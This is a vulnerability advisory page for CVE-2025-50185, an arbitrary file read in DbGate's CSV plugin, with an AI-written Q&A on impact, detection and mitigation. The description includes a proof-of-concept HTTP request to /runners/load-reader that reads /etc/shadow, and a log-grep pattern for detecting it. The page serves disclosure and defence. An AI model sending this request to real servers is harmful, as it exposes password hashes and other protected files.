CVE-2025-50185
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-07-26

Last updated on: 2025-07-29

Assigner: GitHub, Inc.

Description
DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue. ``` POST /runners/load-reader HTTP/1.1 Host: <REPLACE ME> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: <REPLACE ME> Content-Type: application/json Authorization: Bearer <REPLACE ME> Content-Length: 127 Origin: http://192.168.124.119:3000 Connection: keep-alive Cookie: <REPLACE ME> Priority: u=0 Cache-Control: max-age=0 {"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"/etc\/shadow","limitRows":100}} ``` The request payload: ![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a) Lines of the file being returned: ![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-07-26
Last Modified
2025-07-29
Generated
2026-05-07
AI Q&A
2025-07-26
EPSS Evaluated
2026-05-05
NVD
CVE-2025-50185
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
dbgate dbgate 6.4.2-alpine
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-29 The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\..\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability in DbGate (version 6.6.0 and below) allows an authenticated user with application-level access to read arbitrary files on the system due to insufficient validation of file paths and file types in the CSV plugin. The plugin does not properly check the content type or file extension before reading files, enabling path traversal attacks that can access sensitive files anywhere on the system, including those restricted to root users like /etc/shadow. [1]


How can this vulnerability impact me? :

This vulnerability can lead to unauthorized disclosure of sensitive information by allowing attackers to read any file on the system through the application interface. This includes critical system files and sensitive data that should be protected, potentially leading to data breaches, exposure of credentials, or other confidential information that could be exploited for further attacks. [1]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by monitoring for HTTP POST requests to the endpoint `/runners/load-reader` that include JSON payloads specifying file paths outside the intended directories, especially paths containing sensitive files like `/etc/shadow`. For example, inspecting logs for requests with payloads containing `"fileName":"/etc/shadow"` or other absolute or path traversal sequences (e.g., `..`) can indicate exploitation attempts. A command to detect such attempts in web server logs could be: `grep -E 'POST /runners/load-reader' /var/log/nginx/access.log | grep 'fileName":"/'` or using tools like `jq` to parse JSON payloads in logs to find suspicious file paths. [1]


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting access to the DbGate application to trusted users only, as the vulnerability requires application-level access. Additionally, monitor and block suspicious requests to the `/runners/load-reader` endpoint that attempt to read arbitrary files. Since no fix or patch is currently available, consider disabling or restricting the vulnerable CSV plugin functionality if possible, or isolating the DbGate instance in a secure environment to limit exposure. Applying network-level controls such as firewall rules to limit access to the application and enforcing strict authentication and authorization policies can also help reduce risk. [1]


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart